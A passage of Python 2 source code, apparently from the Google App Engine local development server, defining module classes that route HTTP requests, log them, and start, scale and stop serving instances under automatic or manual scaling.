self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=has_file_changes)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIModule listens for RPC requests on.
api_port: The port that APIModule listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
self._module_configuration = module_configuration
self._name = module_configuration.module_name
self._host = host
self._api_host = api_host
self._api_port = api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_config = php_config
self._python_config = python_config
self._cloud_sql_config = cloud_sql_config
self._request_data = request_data
self._allow_skipped_files = allow_skipped_files
self._threadsafe_override = threadsafe_override
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
self._default_version_port = default_version_port
self._port_registry = port_registry
self._instance_factory = self._create_instance_factory(
self._module_configuration)
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._module_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
self._balanced_module = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
@property
def name(self):
"""The name of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even in the
module configuration changes.
"""
return self._name
@property
def ready(self):
"""The module is ready to handle HTTP requests."""
return self._balanced_module.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on."""
assert self._balanced_module.ready, 'balanced module not running'
return self._balanced_module.port
@property
def host(self):
"""The host that the HTTP server(s) for this Module is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def module_configuration(self):
"""The application_configuration.ModuleConfiguration for this module."""
return self._module_configuration
@property
def supports_interactive_commands(self):
"""True if the module can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status):
start_response('%d %s' % (status, httplib.responses[status]), [])
return []
def _handle_request(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst:
try:
environ['SERVER_PORT'] = str(self.get_instance_port(inst.instance_id))
except request_info.NotSupportedWithAutoScalingError:
environ['SERVER_PORT'] = str(self.balanced_port)
else:
environ['SERVER_PORT'] = str(self.balanced_port)
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], self._default_version_port)
with self._request_data.request(
environ,
self._module_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (urllib.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = urllib.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._module_configuration.application,
version_id=self._module_configuration.major_version,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version,
module=self._module_configuration.module_name)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(module_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'module_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'TRACE') and
int(environ.get('CONTENT_LENGTH') or '0') != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
with self._handler_lock:
handlers = self._handlers
try:
request_url = environ['PATH_INFO']
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(request_url)
if match:
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
except StandardError, e:
logging.exception('Request to %r failed', request_url)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _async_shutdown_instance(self, inst, port):
_THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
except:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
variable length to emulate the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
def set_num_instances(self, instances):
"""Sets the number of instances for this module to run.
Args:
instances: An int containing the number of instances to run.
Raises:
request_info.NotSupportedWithAutoScalingError: Always.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this module to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the module from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the module."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_module(self):
"""Returns a InteractiveCommandModule that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandModule(self._module_configuration,
self._host,
self._balanced_port,
self._api_host,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_config,
self._python_config,
self._cloud_sql_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files,
self._threadsafe_override)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, unicode):
body = body.encode('ascii')
url = urlparse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': cStringIO.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': cStringIO.StringIO(body)}
if fake_login:
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
util.put_headers_in_environ(headers, environ)
environ['HTTP_HOST'] = host
return environ
class AutoScalingModule(Module):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for AutoScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(AutoScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_automatic_scaling(
self._module_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
# A deque containg (time, num_outstanding_instance_requests) 2-tuples.
# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._instance_adjustment_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Module.
Args:
permit_warmup: If True then the new instance.Instance will be sent a new
warmup request if it is configured to receive them.
Returns:
The newly created instance.Instance. Returns None if no new instance
could be created because the maximum number of instances have already
been created.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._module_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
_THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
return int(math.ceil(peak_concurrent_requests /
self.max_instance_concurrent_requests))
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
Module that not are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
def _choose_instance(self, timeout_time):
"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
key=lambda instance: instance.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
def _loop_adjusting_instances(self):
"""Loops until the Module exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingModule(Module):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
_MAX_REQUEST_WAIT_TIME = 10
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for ManualScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(ManualScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_manual_scaling(module_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the module has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in xrange(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
